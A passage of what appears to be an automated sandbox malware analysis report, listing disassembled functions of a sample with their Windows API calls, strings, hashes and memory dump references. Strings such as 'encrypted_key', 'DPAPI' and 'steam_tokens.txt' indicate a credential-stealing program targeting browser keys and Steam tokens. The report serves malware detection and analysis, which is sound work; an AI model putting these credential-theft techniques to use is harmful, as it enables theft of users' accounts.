                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID: Windows 11
                        • API String ID: 3225020163-2517555085
                        • Opcode ID: 526348952dcf851a186025071360582bfd356d6ea5c8bd35057ab40bde3850c9
                        • Instruction ID: 6a0f120aba353b7ff8e51314207eb0125909435da4dcdae4dd8686ae635ecdf7
                        • Opcode Fuzzy Hash: 526348952dcf851a186025071360582bfd356d6ea5c8bd35057ab40bde3850c9
                        • Instruction Fuzzy Hash: 9C01A271601219BBEB20DBA4EC4DFAA7B6CFB44311F008158FE08D2290EA75599687A5
                        Function 004F71F0 Relevance: 9.1, APIs: 6, Instructions: 142memorylibraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(?), ref: 004F723E
                        • GetProcessHeap.KERNEL32(00000008,00000010), ref: 004F7279
                        • RtlAllocateHeap.NTDLL(00000000), ref: 004F7280
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 004F72C3
                        • HeapFree.KERNEL32(00000000), ref: 004F72CA
                        • GetProcAddress.KERNEL32(00000000,?), ref: 004F7329
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                        • String ID:
                        • API String ID: 174687898-0
                        • Opcode ID: 7e90ff3b3cb373cf80cbc32bf9d4a2b5bec2ef2368c1bba05e9ee52af820488d
                        • Instruction ID: eec00e80222fbeed7c781f78638e5afa171ec7ea34cfae9d2b8bab57b9f88000
                        • Opcode Fuzzy Hash: 7e90ff3b3cb373cf80cbc32bf9d4a2b5bec2ef2368c1bba05e9ee52af820488d
                        • Instruction Fuzzy Hash: 92415071B0560A9BD720CF69DC84BBAB3E8FB88305F1445AAEE4DC7340E639E901DB54
                        Function 004F9C70 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 124memorystringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000), ref: 004F9CA8
                        • LocalAlloc.KERNEL32(00000040,?), ref: 004F9CDA
                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 004F9D03
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocLocallstrcpy
                        • String ID: $"encrypted_key":"$DPAPI
                        • API String ID: 2746078483-738592651
                        • Opcode ID: 1688539a3a3c6000dd55e99c2eac77c8d1081ba90813fc8b40a290694dacba20
                        • Instruction ID: e0ef5d78b6119db24a6d90c03a755a13403e1ea30b934a70a6276759670b076a
                        • Opcode Fuzzy Hash: 1688539a3a3c6000dd55e99c2eac77c8d1081ba90813fc8b40a290694dacba20
                        • Instruction Fuzzy Hash: 5141AD31E0024D9BDB21EF65D941BBF77B4EF90308F14406AEA15A7392DA78ED01CB98
                        Function 0050E9E0 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON
                        Download Yara Rule
                        APIs
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0050EA24
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050EA53
                        • lstrcat.KERNEL32(?,00000000), ref: 0050EA61
                        • lstrcat.KERNEL32(?,00521794), ref: 0050EA7A
                        • lstrcat.KERNEL32(?,01038B90), ref: 0050EA8D
                        • lstrcat.KERNEL32(?,00521794), ref: 0050EA9F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FolderPathlstrcpy
                        • String ID:
                        • API String ID: 818526691-0
                        • Opcode ID: 021e1e1980de3750bbb3e7276c6f4d1c5dc6f55cfc9b3db9fa7b8dcb764b1c09
                        • Instruction ID: 646daf004a07f74ef16e4d155c8f634efa7f323982ba2fb4d97bc9a6687bba0d
                        • Opcode Fuzzy Hash: 021e1e1980de3750bbb3e7276c6f4d1c5dc6f55cfc9b3db9fa7b8dcb764b1c09
                        • Instruction Fuzzy Hash: 1241F771E1011DABCB60EB64DC42EFD3778FF98300F0044A9BB1A97280DE749E858B58
                        Function 0050ECB0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0050ECDF
                        • lstrlen.KERNEL32(00000000), ref: 0050ECF6
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050ED1D
                        • lstrlen.KERNEL32(00000000), ref: 0050ED24
                        • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 0050ED52
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID: steam_tokens.txt
                        • API String ID: 367037083-401951677
                        • Opcode ID: 4421bb01c79e7223e0c96ecfb64e56044bf9ab7ae2214e383edb22e882f54f05
                        • Instruction ID: 1120a5d52cc522cac36b2fd3512b822fa74b2f902003c6328704e690767ca38c
                        • Opcode Fuzzy Hash: 4421bb01c79e7223e0c96ecfb64e56044bf9ab7ae2214e383edb22e882f54f05
                        • Instruction Fuzzy Hash: 5B31D432B101095BC721BB3AED4BA6E7B68FF40304F045429F905DB292DB78DC1647C9
                        Function 004F9A80 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,004F140E), ref: 004F9A9A
                        • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,004F140E), ref: 004F9AB0
                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,004F140E), ref: 004F9AC7
                        • ReadFile.KERNEL32(00000000,00000000,?,004F140E,00000000,?,?,?,004F140E), ref: 004F9AE0
                        • LocalFree.KERNEL32(?,?,?,?,004F140E), ref: 004F9B00
                        • CloseHandle.KERNEL32(00000000,?,?,?,004F140E), ref: 004F9B07
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                        • String ID:
                        • API String ID: 2311089104-0
                        • Opcode ID: f3e9e134ab792480e9df4d36e19ca02d9d294ec249e299d9f7ef9bf6656624fc
                        • Instruction ID: f2b2824edc75f64865d50eb451270beaa1545c655d01efe3ed8b567ed54f3199
                        • Opcode Fuzzy Hash: f3e9e134ab792480e9df4d36e19ca02d9d294ec249e299d9f7ef9bf6656624fc
                        • Instruction Fuzzy Hash: 50114F71A0020DAFE720DF69DD84FBB736CFB04344F14415AFA1196290DB78AD11CB69
                        Function 00515AD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135COMMON
                        Download Yara Rule
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00515B14
                          • Part of subcall function 0051A173: std::exception::exception.LIBCMT ref: 0051A188
                          • Part of subcall function 0051A173: std::exception::exception.LIBCMT ref: 0051A1AE
                        • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00515B7C
                        • memmove.MSVCRT(00000000,?,?), ref: 00515B89
                        • memmove.MSVCRT(00000000,?,?), ref: 00515B98
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                        • String ID: vector<T> too long
                        • API String ID: 2052693487-3788999226
                        • Opcode ID: 053da417fe043f86acbaba0b0d030f2a5e077dd1a6bb4cf7f201894f4c8c451c
                        • Instruction ID: 39962bea5ced6e49bd5716b99f4c1357cf826f207535b878bcdb7e73b5b83e8e
                        • Opcode Fuzzy Hash: 053da417fe043f86acbaba0b0d030f2a5e077dd1a6bb4cf7f201894f4c8c451c
                        • Instruction Fuzzy Hash: ED416E71B005199FDF08DF6CC895AAEBBA5FB88310F148229E909EB384E730DD40CB90
                        Function 00507D40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON
                        Download Yara Rule
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00507D58
                          • Part of subcall function 0051A1C0: std::exception::exception.LIBCMT ref: 0051A1D5
                          • Part of subcall function 0051A1C0: std::exception::exception.LIBCMT ref: 0051A1FB
                        • std::_Xinvalid_argument.LIBCPMT ref: 00507D76
                        • std::_Xinvalid_argument.LIBCPMT ref: 00507D91
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xinvalid_argumentstd::_$std::exception::exception
                        • String ID: invalid string position$string too long
                        • API String ID: 3310641104-4289949731
                        • Opcode ID: ff16afddd89e2277ce6ffa7c9b766adec37be7d53c79e2766c7c8c63435ac70e
                        • Instruction ID: 34152de967c146be2cc39813db5825861eee46cd5eb9fd99cafe9d1e78e15ed1
                        • Opcode Fuzzy Hash: ff16afddd89e2277ce6ffa7c9b766adec37be7d53c79e2766c7c8c63435ac70e
                        • Instruction Fuzzy Hash: 1321E9327042045BD721DE6CD881A3EBBE5BF95710F244A6EE442CB2C1D770EC40C765
                        Function 005133C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005133EF
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005133F6
                        • GlobalMemoryStatusEx.KERNEL32 ref: 00513411
                        • wsprintfA.USER32 ref: 00513437
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                        • String ID: %d MB
                        • API String ID: 2922868504-2651807785
                        • Opcode ID: 40f8df2a9358ae39c85ca3d2299370435518704d3e2f4d3fabb0d9478c348e59
                        • Instruction ID: a6b9ba429398c79ca28fb9f482249ee936fb0ac0bbc3d3204772f265ca0fd181
                        • Opcode Fuzzy Hash: 40f8df2a9358ae39c85ca3d2299370435518704d3e2f4d3fabb0d9478c348e59
                        • Instruction Fuzzy Hash: 9801FC71A04218AFEB14DF98DD49BBEBBBCFB45710F004529FA06E7380D7B85D0186A5
                        Function 0051926D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __amsg_exit$__getptdfree
                        • String ID: XuR$XuR
                        • API String ID: 2640026729-246973053
                        • Opcode ID: c5274d6643135cebbcd7638ef99fc5624e136d48fa6b199734cf66bd7b78c6e5
                        • Instruction ID: 43d56b4e40bcb7a90b9f0f0b58234104dd7b535fba03192e1d56209851282a52
                        • Opcode Fuzzy Hash: c5274d6643135cebbcd7638ef99fc5624e136d48fa6b199734cf66bd7b78c6e5
                        • Instruction Fuzzy Hash: F401C43694572ABBFA20AB2C9419BDDBBA0BF59710F140104E42067580CB346CC1DBD5
                        Function 0050D7B0 Relevance: 7.6, APIs: 5, Instructions: 127registrystringCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,0103D428,00000000,00020119,?), ref: 0050D7F5
                        • RegQueryValueExA.ADVAPI32(?,0103DF30,00000000,00000000,00000000,000000FF), ref: 0050D819
                        • RegCloseKey.ADVAPI32(?), ref: 0050D823
                        • lstrcat.KERNEL32(?,00000000), ref: 0050D848
                        • lstrcat.KERNEL32(?,0103DF48), ref: 0050D85C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmpDownload File
